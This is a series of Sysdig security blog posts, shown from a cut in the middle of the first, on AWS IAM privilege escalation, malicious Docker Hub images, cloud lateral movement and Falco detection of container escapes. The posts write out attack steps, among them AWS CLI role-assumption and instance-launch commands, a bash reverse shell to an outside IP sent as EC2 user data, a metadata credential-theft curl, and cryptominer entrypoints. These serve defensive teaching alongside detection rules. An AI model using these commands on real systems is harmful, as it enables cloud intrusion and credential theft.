  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::7208********:user/operator"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

The attacker can now proceed, impersonating the new role using assume-role. It returns the temporary security credentials that can be used to access the cloud environment with the new role.

aws sts assume-role --role-arn "arn:aws:iam::ARN-TARGET:role/dev-EC2Full" --role-session-name AWSCLI-Session

😲Surprise!

Importing the new keys obtained locally and checking the user we are currently logged in with, the attacker successfully escalated the privileges inside the environment. Of course, they could be used to access all the policies, including the AWS managed ones.

aws sts get-caller-identity

This would give the attacker full privileges over EC2s, with the chance to spawn instances for its purposes.

In this real-world scenario, a user with iam:UpdateAssumeRolePolicy IAM privilege misconfigured could lead an attacker to have full control over EC2 inside the cloud account. For an attacker, that means the chance to create new instances and/or destroy what is already in place, causing serious damage to the company.

Scenario #3: A user can create EC2 instances, and pass the role

In this scenario, we can see how the combination of IAM and EC2 privileges could lead to an attacker escalating the privileges from zero to hero into the account.

The attacker was able to get valid AWS credentials via a spare phishing attack. The compromised cloud user has the permissions to run EC2 Instances, as well as the ability to pass roles.

Using those privileges, the adversary is able to escalate the privileges inside the account, run an EC2 instance, and exfiltrate information stored in bucket S3.

As we can see from the image below, the compromised user is part of a group DevOps.

aws iam list-groups-for-user --user-name operator

Checking the permissions attached to the group, we see two policies attached:

aws iam list-attached-group-policies --group-name devOps

Focusing on the dev-Ops police, we can see it has the iam:PassRole and ec2:RunInstances permissions attached.

aws iam get-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/dev-Ops --version-id v1

The combination of these two privileges could let the misconfigured user create a new EC2 instance. Not only that, but they will have operating system access, and pass an existing EC2 instance profile/service role to it.

🤯

As we can see below, running the command run-instances, the user is able to run a new instance using other information gathered in the account. Using the flag, it’s possible to pass --iam-instance-profile directly during the instance creation without having further permissions.

Looking through the available roles in the cloud account, the devOps-S3Full role looks interesting and can be used by the EC2 services.

aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name="devOps-S3Full" --user-data file://revshell.sh

The revshell.sh script file contains a script to open a bash reverse shell in one way or another, reported in the code below. It is worth noting that to create the instance, the attacker doesn’t require any SSH keys or security group.

#!/bin/bash
bash -i >& /dev/tcp/107.21.43.88/443 0>&1

Once the machine is launched, the script is executed and the attacker is able to get a running shell on the machine with the root user. In this way, the attacker has full control over the machine to execute whatever they want, as we can see in the image below.

As we have seen before, while using the PassRole privilege, the user can pass whatever permission it wants to the created machine.

In this case, the attacker passes the FullS3bucket access to the instance.

curl http://169.254.169.254/l2021-07-15/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

The attacker can then log into the instance and request the associated AWS keys from the EC2 instance metadata. As seen before, the attacker can import the temporary credentials and use it to log into the cloud account with the role associated with the EC2 created before.

aws sts get-caller-identity

Once logged in, the adversary now has full control over S3 bucket with the chance to exfiltrate sensible information or destroy all the files found on the available bucket.

In this case, the attacker found interesting buckets containing credentials and others related to Kubernetes environment. Deleting those files might cause serious damages to the environment running.

aws s3 ls

In this attack scenario, we have seen how an attacker with a combination of two security misconfigurations was able to access the set of permissions that the instance profile/role has, which could range from no privilege escalation to full administrator access of the AWS account.

Detecting IAM security misconfigurations

All the attacks we have seen before were possible due to AWS security misconfiguration somewhere in the environment.

Those use cases may sound silly or unlikely, but are you sure you have a clear picture and really know what permissions are applied in your environment?

Even more importantly, how can we also track and validate the changes applied?

Detecting cloud malicious changes

Fortunately, when the attacker uses the privileges attached to the compromised user, they are going to leave very recognizable tracks.

Also, when someone is performing changes in the infrastructure, it will leave tracks like “which action has been performed and over what type of service.”

AWS provides strong capabilities to understand what is going on in the environment. CloudTrail records actions taken by a user, role, or an AWS service from AWS Management Console, AWS Command Line Interface, and AWS SDKs and APIs.

Through CloudTrail, we can see the operator user calling the UpdateAssumeRolePolicy, along with the target role and other context information:

Using another AWS feature, CloudWatch, it’s possible to create alerts based on CloudTrail events.

In this case, let’s create an alert if someone enables the feature with the following filter:

{ ( ($.eventSource = "iam.amazonaws.com") && (($.eventName = "Put*Policy") || ($.eventName = "Attach*") || ($.eventName = "Detach*") || ($.eventName = "Create*") || ($.eventName = "Update*") || ($.eventName = "Upload*") || ($.eventName = "Delete*") || ($.eventName = "Remove*") || ($.eventName = "Set*")) ) }
{ ( ($.eventSource = "iam.amazonaws.com") && (($.eventName = "Add*") || ($.eventName = "Attach*") || ($.eventName = "Change*") || ($.eventName = "Create*") || ($.eventName = "Deactivate*") || ($.eventName = "Delete*") || ($.eventName = "Detach*") || ($.eventName = "Enable*") || ($.eventName = "Put*") || ($.eventName = "Remove*") || ($.eventName = "Set*") || ($.eventName = "Update*") || ($.eventName = "Upload*")) ) }

Why is detecting IAM security misconfigurations hard to do?

The hard issue in detecting attackers once they have successfully compromised a user with security misconfiguration is that it could be hard to detect since they aren’t actually malicious behavior per se.

Running instances or updating Assume Role Document are legitimate actions if done by the right people. So how can we know if a user is really authorized to perform a specific action and proactively take measures before something bad happens?

To answer this question, you need to have a clear view of your environment and AWS security best practices applied. Having best practices applied for Cloud IAM comes in handy when you need to assess the privileges attached to each user or group. For example, if you see the dev group has attached policies related to IAM and you applied the least privilege concept in your environment, you can easily understand that there is something wrong in place for this specific group.

However, applying best practices isn’t enough. To be sure to enforce the best practices and proactively take remediation action, you need to know what is in place in your environment. Of course, it’s not that easy to have a nice and clear picture of which policies and roles are applied to a group, user, or service account.

You have to rely on security tools that continuously monitor for anomalous activity in the cloud, and then can generate security events from there. In the case of AWS, gathering traces from CloudTrail events among other sources. With the right tools, you can easily assess and strengthen your cloud security.

Finally, we can use Falco, an open source runtime security threat detection and response engine, to detect threats at runtime by observing the behavior of your applications and containers running on cloud environments. Falco extends support for threat detection across multiple cloud environments via Falco Plugins. By streaming logs from the cloud provider to Falco, instead of installing the Falco agent in the cloud environment, we have the deep visibility required to perform posture management.

Conclusion

The real-life scenario attacks we presented show how it’s possible for an adversary to use IAM security misconfigurations to gain high privileges inside a cloud environment.

Such attacks can start with valid credentials found online, or obtained from tricking users via phishing, and may proceed with further privilege escalation to take control over the account.

By leveraging AWS features like CloudTrail, CloudWatch among others, it’s possible to get alerted when changes are applied in your environment, triggering automatic response.

Check out our “Cloud Infrastructure Entitlements Management (CIEM) with Sysdig Secure” article to discover how easy it is to detect each attack scenario with Sysdig Secure for cloud.

The Sysdig Secure DevOps Platform provides the visibility you need to confidently run containers, Kubernetes, and cloud. Built on an open-source stack with SaaS delivery, it is radically simple to run and scale.

You’ll be set in only a few minutes. Try it today!

The post Exploiting IAM security misconfigurations appeared first on Sysdig.

Analysis on Docker Hub malicious images: Attacks through public container images

Stefano Chierici — Wed, 23 Nov 2022 16:30:00 +0000

Supply Chain attacks are not new, but this past year they received much more attention due to high profile vulnerabilities in popular dependencies. Generally, the focus has been on the dependency attack vector. This is when source code of a dependency or product is modified by a malicious actor in order to compromise anyone who uses it in their own software.

The 2020 attack against the SolarWinds security software is one of the most popular recent examples of this technique, where attackers hid backdoors in the product itself.

Source code dependencies are not the only attack vector that can be used to conduct an offensive supply chain operation. Containers have become a hugely popular attack vector in recent years. Since container images are designed to be portable, it is very easy for one developer to share a container with another individual.

There are multiple open source projects available providing the source code to deploy a container registry, or free access container registries for developers to share container images. Docker Hub is the most popular free and public-facing container registry. It houses pre-made container images, which provide the great advantage of having all required software installed and configured. These features make it very tempting for developers to leverage these containers as it can save a significant amount of time and effort.

Attackers understand these benefits and can create images that have malicious payloads built in.

A user will then run the “docker pull ” command and have the container up and running very quickly. The attacker’s misconfigurations and/or malware is now installed on the user’s machine or a cloud instance where the user is deploying their workloads. A Docker Hub download and installation is opaque; therefore, users should inspect the manifest (i.e., Dockerfile) prior to download and ensure that the source is legitimate and the image is clean.

The Sysdig Threat Research Team performed an analysis of over 250,000 Linux images in order to understand what kind of malicious payloads are hiding in the containers images on Docker Hub.

This article is part of the 2022 Sysdig Cloud-Native: Threat report.

Docker Hub

Docker Hub is a cloud-based image repository in which anyone in the world can download, create, store, and deploy Docker container images for free. It provides access to public open-source image repositories, and each user can create their own private repositories to store personal images.

Docker Hub provides official images which are reviewed and published by the Docker Library Project, making sure that best practices are followed and providing clear documentation and regular updates. In addition, Docker Hub enables Independent Software Vendors (ISVs) via The Docker Verified Publisher Program. Development tool vendors in this program can distribute trusted Dockerized content through Docker Hub with images signed by Verified Publisher, reducing a user’s chance of downloading malicious content.

Looking at statistics from the 2022 Sysdig Cloud-Native Security and Usage Report, 61% of all images pulled come from public repositories, with an increase of 15% from 2021. This means the flexibility and other features provided by public repositories is well appreciated by users, but at the same time, there is an increased risk for exposure to malicious images.

Typosquatting, Cryptominers, and Keys

The Sysdig Threat Research Team built a classifier to extract and collect information about recently updated images in Docker Hub to determine if those images contained anything anomalous or malicious within the image layers.

The team extracted information like secrets, IPs, and URLs to evaluate if a specific image might be malicious. To perform all of these operations across a large number of images, the extraction and validation process was automated for scalability. This approach allowed for the rapid analysis of all the extracted information for hundreds of thousands of images. Sysdig TRT used multiple open source tools and services to determine if IPs and URLs were malicious or not.

During the analysis, over 250,000 Linux images were analyzed over several months, excluding the official images and verified images. The focus of the investigation was on public images uploaded by users around the world.

Dangerous Images in Public Registries

The Sysdig Threat Research Team collected malicious images based on several categories, as shown below. The analysis focused on two main categories: malicious IPs or domains, and secrets. Both can represent a threat for people downloading and deploying images publicly available in Docker Hub, exposing their environment to high risks.

The following graphic classifies all 1,652 images that were identified as malicious by type of nefarious content included in their layers.

As expected, cryptomining images are the most common malicious image type. However, embedded secrets in layers are the second most prevalent, which highlights the persistent challenges of secrets management. Secrets can be embedded in an image due to unintentionally poor coding practices or this could be done intentionally by a threat actor. By embedding an SSH key or an API key into the container, the attacker can gain access once the container is deployed. To prevent accidental leakage of credentials, sensitive data scanning tools can alert users as part of the development cycle.

The images that have secrets embedded in their layers represent a large portion of the malicious images. Sysdig TRT divided those images into subcategories based on the type of leaked secret, as shown in the following graph.

Sysdig TRT also included public keys in the SSH keys category because they are most likely deployed for illegitimate uses when embedded in container images. For instance, uploading a public key to a remote server allows the owners of the corresponding private key to open a shell and run commands via SSH, similar to implanting a backdoor.

The secrets belonging to the other categories could allow anyone to authenticate to different services and platforms, since they are publicly accessible in the layers.

Malicious Images Disguised as Legitimate Software

During the research in Docker Hub, Sysdig TRT found images names to appear as popular open source software in order to trick users to download and deploy them. This practice is known as typosquatting, pretending that they are the legitimate and official image while hiding something nefarious within their layers.

The following images are named as legitimate images that provide common services but instead are hiding cryptocurrency miners. A careless user may accidentally install one of these images instead of an official one they intended. Such mistakes most often occur when utilizing crowdsourced knowledge, like copying and pasting code or configurations from blogs or forums.

Malicious Images Impersonating Legitimate Software

Inspecting the layers of these images verifies that they are cryptominers. Indeed, these are some of their layers.

…cut
/bin/sh -c git clone https://github.com/OhGodAPet/cpuminer-multi
…cut
ENTRYPOINT ["/bin/minerd" "-a" "cryptonight" "-o" "stratum+tcp://xmr.pool.minergate.com:45560" "-u" "XXXXX@XXXXXX.com" "-p" "x" "-t" "1"]

Image layers can be explored directly on Docker Hub. For instance, the layers of ynprpagamentitk/liferay are accessible at this URL.

Interestingly, those images were published by different users but all of them contain the same layers, meaning that they most likely belong to the same threat actor or are following an attacker playbook. Also, every one of those users published only one image, making it harder to track this threat actor. The repository cloned in the first of the previous layers no longer exists, but its name strongly suggests it was a mining tool. Also, the Github user OhGodAPet is still active and has forked several repositories of mining tools.

In the last of the previous layers, the malicious image executes the “minerd” binary with some parameters, including the miner URL “stratum+tcp://xmr.pool.minergate.com:45560.”

The number of downloads for each image shows that hundreds of users were tricked into pulling images that they thought were legitimate, without knowing that those images were miners.

Sysdig TRT found another user, vibersastra, who joined Docker Hub on July 31, 2022 and uploaded exclusively disguised images, in particular:

Malicious Images Impersonating Legitimate Software

By looking at the layers, it is clear that those images download the XMRig miner tool and then use it to mine Monero toward the owner’s wallet, as shown below:

…cut
RUN /bin/sh -c git clone --branch "v6.17.0" https://github.com/xmrig/xmrig # buildkit
…cut
RUN /bin/sh -c chmod +x /xmrig/build/xmrig.sh # buildkit
…cut
CMD ["--url=pool.hashvault.pro:80" "--user=88XgkSPJV9u28F4SJQtdW6U46RKDHB36aTzeM2f1yWsxTcX8QuSPDbHU1TTXChYpBeh9McphG2GYN77Lhu7jtfvp3HVytgc.featuring" "--algo=rx/0" "--pass=x" "-t 4"]

Mitigation

It’s clear that container images have become a real attack vector, rather than a theoretical risk. The methods employed by malicious actors described by Sysdig TRT are specifically targeted at cloud and container workloads. Organizations deploying such workloads should ensure that they enact appropriate preventative and detective security controls that are capable of mitigating cloud-targeting attacks.

The research conducted here has allowed the Sysdig Threat Research Team to create a feed of known malicious container images based on their SHA-256 digest. By using this feed, Sysdig customers are able to alert whenever any of these containers are seen in their environment and take appropriate response actions. If a known malicious container appears in the environment, it can immediately be killed, paused, or stopped while notifying the security team. Prevention can also be accomplished by integrating the Sysdig TRT feed with an admission controller, which can prevent the deployment of an image based on its digest.

Final words

Much of the software used today depends on numerous amounts of other software packages. The origin of these dependencies is extremely varied with some being produced and supported by major corporations, while others are developed by unknown parties who may not be supporting their projects anymore.

This notion of sharing code has also spread to containers, where people can easily share their container-based creations on sites like Docker Hub. This has made testing and deploying entire platforms very easy, but has also increased the risk of using something malicious. Threat actors are placing malware into shared containers, hoping users will download and run them on their infrastructure. The malware installed can be anything from cryptominers to backdoors to tools that will automatically exfiltrate data.

It is more important than ever to understand and monitor what happens in your organization’s containerized environments.

Want more? Download the full 2022 Sysdig Cloud-Native: Threat report.

The post Analysis on Docker Hub malicious images: Attacks through public container images appeared first on Sysdig.

Cloud lateral movement: Breaking in through a vulnerable container

Stefano Chierici — Mon, 25 Jul 2022 10:00:20 +0000

Lateral movement is a growing concern with cloud security. That is, once a piece of your cloud infrastructure is compromised, how far can an attacker reach?

What often happens in famous attacks to Cloud environments is a vulnerable application that is publicly available can serve as an entry point. From there, attackers can try to move inside the cloud environment, trying to exfiltrate sensitive data or use the account for their own purpose, like crypto mining.

In this article, we’ll introduce a staged, but real-world scenario to showcase how it would be possible for an attacker to get full access to a cloud account. We’ll also cover how to detect and mitigate this kind of attack by using Sysdig Cloud Connector.

The scenario for lateral movement

Let’s start this cloud security exercise with a vulnerable Struts2 application, running in a Kubernetes cluster and hosted inside an AWS account.

Once an attacker gets access to the pod, they will assess the environment looking for secrets or credentials to perform lateral movement and escalate the privileges.

Those credentials can potentially be found inside the aws metadata. Once obtained, the attacker will have access to the AWS account, and from there they can start poking around.

Having access to the cloud infrastructure, the attacker will look for misconfigurations that would enable their next actions. For example, solidifying position by persisting their permissions, impairing the cloud defenses, or escalating their privileges. Ultimately the attacker can cause harm looking for data to exfiltrate, or by installing a crypto miner or bot control center.

Now that we understand the overall strategy of our adversary, let’s dig deeper into their actions.

Step 1: Exploiting a public facing web application

One of the Initial access TTP (tactics, techniques and procedures) reported in the Cloud MITRE ATT&CK is via Exploiting Public-Facing Application. It makes sense. After all, anything public is already accessible.

In this scenario, there is an Apache Struts2 application publicly available.

To see if the available instance is affected by well-known vulnerabilities, attackers start doing passive and active gathering information activities. Interacting with the web application, it is possible to retrieve software versions and other additional information regarding the application deployed. From there, the attacker can query vulnerability databases looking for an entry point.

The attacker discovers that the Apache Struts2 version we are using is vulnerable to CVE-2020-17530, which permits remote code execution on the machine. If the attacker manages to exploit this particular vulnerability, they would be able to execute arbitrary code in the machine, including opening a reverse shell within the system.

The attacker sends a crafted HTTP request to the server, and voilà, a shell opens from the victim host to an attacker machine.

The bash command required to open the reverse shell contains special characters, which could cause errors during the execution. To avoid this, it is common to encode the command in base64, decoding it during the execution.

From the hostname, apache-struts-6c8974d494, the attacker can see they landed in a pod or container inside a Kubernetes Cluster.

Step 2: Lateral movement to the cloud

Now that our adversary is in, they have to reckon the terrain. You may think that having landed in a container, the attacker is fairly restricted. And you would be correct, but they still have some options to compromise our cloud security.

The attacker checks if the pod has access to the AWS instance metadata.

It looks like it does. There might be useful information regarding the cloud environment that would help the attacker escalate privileges or perform lateral movement.

Looking at the IAM credentials, the adversary finds the AWS IAM role credentials associated with the Kubernetes node where the pod is running.

The attacker can now import the credentials in their own environment and have direct access to the cloud account via cli.

Step 3: Privilege escalation via policy misconfiguration

At this point, the attacker is able to connect to the AWS account with the stolen credentials.

The first thing they do is start evaluating the roles and policies attached to the impersonated role, trying to find a way to escalate privileges inside the cloud environment.

That devAssumeRole policy looks promising. Let’s see what permissions it grants.

With the AssumeRole, the adversary has the option to act as other users. This is a weird permission to grant to an account like this one. It’s likely a misconfiguration, the kind the attacker was looking for.

Also, with the ReadOnlyAccess privilege, the attacker is able to enumerate the roles available in the AWS account and find which of those they can assume based on the restrictions in place. In this case the attacker can impersonate roles which start with the word “dev.” One of the roles the current users can assume is dev-EC2Full, which permits full control over EC2s.

Assuming this role, the attacker is able to act like a dev user, who has full access over EC2 instances, with the ability to create new instances for their own purpose.

Next steps

Let’s recap what we have discussed so far and the two main flows:

A vulnerable public-facing application is running in a Kubernetes production environment. It is used by the attacker as an entry point to the environment.
A misconfiguration in dev-related IAM policy attached to a production entity (an EC2 instance running a Kubernetes node), allowing the attacker to assume a more powerful role and escalate the privileges inside the cloud environment.

At this point, the attacker has enough permissions to cause harm to our organization. They could start acting now, or further try to compromise our cloud security and obtain greater access. Don’t miss our “Unified threat detection across AWS cloud and containers” article for a more comprehensive view on the following steps our attacker could take, and see what tools AWS offers to prevent, detect, and mitigate these attacks.

Detecting a lateral movement attack using Sysdig Secure

Fortunately, these kinds of attacks leave a very recognizable track. For example, a reverse shell is something unusual and a runtime security tool can easily raise an alarm. Additionally, security tools can flag misconfigurations. With the right tools, you can strengthen your cloud security.

With Sysdig Secure for cloud, let’s see how you are able to detect this attack in each of its steps.

Detecting public-facing web application exploitation

We saw how the attacker was able to exploit a vulnerability, allowing them to open a reverse shell in the victim pod.

By tapping into the system events, Sysdig knows it happened. One of its many out-of-the-box Falco rules was triggered, and an alert was generated:

Thanks to the metadata collected by the Sysdig Agent deployed in the Kubernetes cluster, the alert contains a lot of useful information. Beyond the IPs involved, the alert also includes the cluster name, namespace, and deployment of the pod.

But what happens once the alert has been triggered? How can you investigate the event if the container disappears?

In the runtime policy configuration, you can enable system event captures. This will collect all the system events around the time the policy is triggered.

Then, you can perform a forensic analysis with Sysdig Inspect and learn what the attacker has done in the system.

Detecting the lateral movement to the cloud

We saw how the attacker established a connection with the pod and then gathered information about the cloud environment by reading the AWS instance metadata.

Let’s see those commands, using Sysdig Inspect to analyze the capture done by the policy when the Reverse Shell alert was triggered.

First, we can see the bash script used to open the reverse shell.

And later, we can see a curl command to the internal IP that was used to retrieve the IAM secrets that granted access to the AWS account.

Detecting Cloud malicious behaviours and misconfigurations

Thanks to Sysdig Secure for cloud, security protection extends to the whole cloud environment. Security alerts will be generated in case security issues are detected in the account based on runtime rules already in place. Here’s an example of a security alert the attacker might have triggered assuming the role dev-EC2Full.

During the scenario, we saw the adversary was able to escalate the privilege due to a misconfiguration in the environment. What if security teams were able to detect the misconfiguration right after it was applied in the environment?

Using Cloud Connector capabilities, it’s possible to create a custom Falco rule that will generate an alert in case a misconfiguration is applied.

In our case, the misconfiguration was applying a dev-related policy to an instance role that was unrelated to dev. With the custom rule reported here, it’s possible to create detection for this specific scenario.

- rule: "Attach a dev-AssumeRole Policy to a non-dev Role"
  desc: "dev-AssumeRole Policy must be attached to only dev Roles so that only dev users can assume extra roles"
  condition:
    jevt.value[/eventName]="AttachRolePolicy"
    and (not jevt.value[/errorCode] exists)
    and (not jevt.value[/requestParameters/roleName] contains "dev")
    and jevt.value[/requestParameters/policyArn]="arn:aws:iam::720870426021:policy/dev-AssumeRole"
  output:
    The dev-AssumeRole has been attached to a Role (%jevt.value[/requestParameters/roleName]) which is not
     related to the dev. requesting IP=%jevt.value[/sourceIPAddress], AWS region=%jevt.value[/awsRegion],
     requesting user=%jevt.value[/userIdentity/arn]"
  priority: "WARNING"
  tags:
    - "cloud"
    - "aws"
  source: "aws_cloudtrail"

In the screenshot below, you can see the rule was correctly triggered once the user attached the policy to the wrong role, alerting security teams of the misconfiguration in a matter of minutes.

As with the previous security event, we can see how Sysdig Secure for cloud offers plenty of useful information. Thanks to the additional metadata gathered by the connector, the event contains key information regarding the AWS account, the affected object, and the user executing the actions.

Conclusion

The real-life scenario attack we presented shows how it is possible for an adversary to lateral move inside a cloud environment. Such attacks can start from a public-facing, vulnerable container, and can be detected and mitigated using the features in Sysdig Secure.

By leveraging the new Sysdig Secure for cloud, security teams can put together security events related to containers and cloud assets, centralizing threat detection and strengthening cloud security. This can all be done with a single tool, out-of-the-box policies, and no need for further custom integrations.

Our tools make the investigation of security events easier. When it’s vital for security teams, they have all the relevant information in the same place, in a centralized timeline, and with a correlation between events.

Try it yourself!

With Sysdig Secure for cloud, you can continuously flag cloud misconfigurations before the bad guys get in, and detect suspicious activity like unusual logins from leaked credentials. This all happens in a single console, making it easier to validate your cloud security posture. And it only takes a few minutes to get started!

Start securing your cloud for free with our Sysdig Free Tier!

The Sysdig Secure DevOps Platform provides the visibility you need to confidently run containers, Kubernetes, and cloud. It’s built on an open-source stack with SaaS delivery, and is radically simple to run and scale.

Request a free trial today!

The post Cloud lateral movement: Breaking in through a vulnerable container appeared first on Sysdig.

How to detect the containers’ escape capabilities with Falco

Stefano Chierici — Tue, 21 Jun 2022 15:00:41 +0000

Attackers use container escape techniques when they manage to control a container so the impact they can cause is much greater. This’s why it is a recurring topic in infosec and why it is so important to have tools like Falco to detect it.

Container technologies rely on various features such as namespaces, cgroups, SecComp filters, and capabilities to isolate services running on the same host and apply the least privileges principle.

Capabilities provide a way to limit the level of access a container can have, splitting the power of the root user into more granular units. However, they are often misconfigured, granting excessive privileges to processes and threads.

CVEs published in recent years have shown that those features can be misconfigured and lead an attacker to escape and escalate the privilege inside the container and the host. Here, we indicate some container breakout vulnerabilities:

CVE-2022-0847: “Dirty Pipe” Linux Local Privilege Escalation.
CVE-2022-0492: Privilege escalation vulnerability causing container escape.
CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape.
CVE-2019-5736: runc container breakout.
CVE-2022-0811: Arbitrary code execution affecting CRI-O.

In this article, we explain how you can detect and monitor capabilities using Falco, analyzing a well-known container escaping technique.

What are capabilities?

Linux documentation clearly defines capabilities as:

“Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.”

As of Linux 3.2, there are 41 capabilities and they are reported in the Linux documentation.

In other words, capabilities divide the privileges of root user into small pieces to grant a thread just enough power to perform specific privileged tasks. Suppose the pieces are small enough and well picked. In that case, even if a privileged program is compromised, the possible damages are limited by the set of capabilities that are available to the process.

A diagram which shows the difference between running with default capabilities and with restricted capabilities by Snyk.

Among all capabilities available, the ones worth a special mention are CAP_SYS_ADMIN and CAP_NET_ADMIN, which are very broad and permissive capabilities.

CAP_SYS_ADMIN is required to perform administrative operations, which are difficult to drop from containers if privileged operations are performed within the container. Due to the broad permissions, it can easily lead to additional capabilities or full root (typical access to all capabilities).

CAP_NET_ADMIN is required to perform all the network-related operations from changing interface configurations, administrating the host firewall and setting promiscuous mode. Even for this capability, the potential damage might be huge if the permissions are misused.

In containers which are isolated environments by definition, the most permissive capabilities are already removed by default. That means if you run a Docker container without specifying additional settings, Docker will use the limited set of capabilities.

So where is the problem?

The key point from the explanation provided before is “small pieces” and this is where the problem begins. Splitting root privileges into small pieces is useful from a security perspective, although we don’t want too many pieces. In addition, the Linux development model doesn’t have a central authority determining how capabilities should be assigned and split.

This confusion brings a lot of doubts and misunderstandings to developers hoping to understand how to proceed. So, lacking sufficient information for a decision, the developer chooses CAP_SYS_ADMIN or similar excessive capabilities for their new feature.

And that brings us to where we are today: CAP_SYS_ADMIN is the new root.

On one hand, the goal of capabilities is to limit the power of privileged programs to be less than root. On the other hand, if we have a program CAP_SYS_ADMIN, the game is more or less over.

In containers, even though a set of capabilities are removed by default, it’s always possible to expand the set of capabilities by specifying the ones to add when running the container. As we know containers can also be run directly as privileged and, in this case, the container can use all the capabilities available, CAP_SYS_ADMIN included.

Hands-on CAP_SYS_ADMIN

Here is an easy example. If we wanted to see the kernel addresses exposed via /proc, this kind of operation isn’t allowed if the container is run without excess capabilities, and if we execute, here is what happens if we run the command.

stefano@stefano falco % docker run -it alpine:latest      
/ # cat /proc/kmsg
cat: can't open 'cat /proc/kmsg': Operation not permitted

Here is what happens if we run the container with CAP_SYS_ADMIN capability instead.

stefano@stefano falco % docker run -it --cap-add CAP_SYS_ADMIN alpine:latest 
/ # cat /proc/kmsg
<4>[6226394.148135] printk: cat (980141): Attempt to access syslog with CAP_SYS_ADMIN but no CAP_SYSLOG (deprecated).

As pointed out in the warning message, we should use the specific capability CAP_SYSLOG to perform this action since it has been created to segregate the permissions from CAP_SYS_ADMIN.

stefano@stefano falco % docker run -it --cap-add CAP_SYSLOG alpine:latest 
/ # cat /proc/kmsg

As you can see, with the right capabilities we can open the file without any warning message by using the right capability.

Let’s now have a look at another example where CAP_SYS_ADMIN is actually required to perform specific actions. In this example, we use the command unshare which to create a new namespace; in this case, inside a container. As reported in the command documentation, unshare requires the CAP_SYS_ADMIN capability to work and perform the actions. As before, let’s see what happens when running the command in a container without adding the capability.

stefano@stefano falco % docker run -it alpine:latest      
/ # unshare
unshare: unshare(0x0): Operation not permitted

Here is what happens if we run the container with CAP_SYS_ADMIN capability instead.

stefano@stefano falco % docker run -it --cap-add CAP_SYS_ADMIN alpine:latest 
/ # unshare
3b28503d0205:/#

As you can see in the last example, it was possible to create the new namespace thanks to the extra privileges.

As the last example points out, there are some actions that require CAP_SYS_ADMIN by design. Thus, the only way to see if there are misuses or malicious behaviors is monitoring the capabilities for threads and processes.

Monitoring capabilities using Falco

Thankfully for us, in the new Falco version 0.32 it’s possible to monitor the thread capabilities and be sure that just the allowed capabilities are available.

Three new fields have been added into Falco to accomplish this task:

Thread.cap_permitted: superset of capabilities a thread may ever get.
Thread.cap_inheritable: set of capabilities that might go in the permitted set after an execve event.
Thread.cap_effective: set of capabilities used by the kernel to perform permission checks needed to run.

In this case, we are in a container run as privileged and we can easily see the list of capabilities applied. Using the command cat /proc/self/status, you can find the cap values applied.

CapInh:	00000000a82425fb
CapPrm:	00000000a82425fb
CapEff:	00000000a82425fb
CapBnd:	00000000a82425fb

Decoding the result 00000000a82425fb value using capsh, you can see the list of capabilities.

capsh --decode=00000000a82425fb
0x00000000a82425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_admin,cap_mknod,cap_audit_write,cap_setfcap

Among the others, we can see the famous CAP_SYS_ADMIN.

Having this information available in Falco allows us to create detection over those capabilities and raise alerts if misconfigured capabilities are applied in our environment.

Detecting container escaping with Falco

In this scenario, we see a well-known container escaping technique which relies on cgroup v1 virtual filesystem and, big surprise, CAP_SYS_ADMIN.

The exploitation has been presented in this blog. In order to perform the escaping, we need the following:

We must be running as root inside the container.
The container must be run with the CAP_SYS_ADMIN Linux capability.
The container must lack an AppArmor profile, or otherwise allow the mount syscall.
The cgroup v1 virtual filesystem must be mounted read-write inside the container.

In particular, cgroup v1 relies on two files notify_on_release and release_agent which are used in the exploitation to execute commands as root and perform container escaping. However, those files are also used in other exploitation to reach the same goal to escalate privileges and break the isolation.

One very recent example is the CVE-2022-0492.

In the case that your container has this capability and has not been detected when it has been created, we have a last line of defense: runtime security with Falco.

Using the Falco and the new visibility over capabilities available in a thread, we are able to detect if the file release_agent is open and modified by a threat which has excessive capabilities. In this case, we check if the thread explicitly contains CAP_SYS_ADMIN in the set of effective capabilities.

- rule: Detect release_agent File Container Escapes
  desc: "This rule detects an attempt to exploit a container escape using release_agent file. By running a container with certains capabilities, a privileged user can modify release_agent file and escape from the container"
  condition:
    open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
  output:
    "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
  priority: CRITICAL
  tags: [container, mitre_privilege_escalation, mitre_lateral_movement]

Thanks to this rule, we can create a strong and noiseless detection on all the techniques that use release_agent and excessive capabilities to break container isolation and comprise the entire node.

10:11:27.415074914: Critical Detect an attempt to exploit a container escape using release_agent file (user= user_loginuid=-1 filename=/tmp/cgrp/release_agent cool_williamson (id=8ed46a770162) image=ubuntu:latest cap_effective=CAP_CHOWN CAP_DAC_OVERRIDE CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_NET_BIND_SERVICE CAP_NET_RAW CAP_SYS_CHROOT CAP_SYS_ADMIN CAP_MKNOD CAP_AUDIT_WRITE CAP_SETFCAP)

Conclusions

Capabilities provide a way to isolate containers although, as we have seen, misconfiguration and excessive capabilities are often part of new CVEs and they might cause significant security issues.

With a tool like Falco, it’s possible to monitor when specific capabilities like CAP_SYS_ADMIN are misused. Using the new Falco fields in rules, it’s now possible to raise security alerts and get flagged when these malicious behaviors happen in your environment.

After that, if you would like to find out more about Falco:

Get started at Falco.org.
Check out the Falco project on GitHub.
Get involved with the Falco community.
Meet the maintainers on the Falco Slack.
Follow @falco_org on Twitter.

The post How to detect the containers’ escape capabilities with Falco appeared first on Sysdig.

Critical Vulnerability in Spring Core: CVE-2022-22965 a.k.a. Spring4Shell

Stefano Chierici — Thu, 31 Mar 2022 15:34:33 +0000

